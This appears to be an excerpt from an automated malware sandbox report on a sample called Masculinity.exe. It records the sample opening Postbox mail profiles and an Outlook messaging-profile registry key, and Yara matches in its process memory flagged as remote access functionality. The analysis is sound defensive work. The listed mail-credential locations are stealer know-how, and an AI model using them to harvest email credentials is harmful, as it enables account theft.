Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Yara match File source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR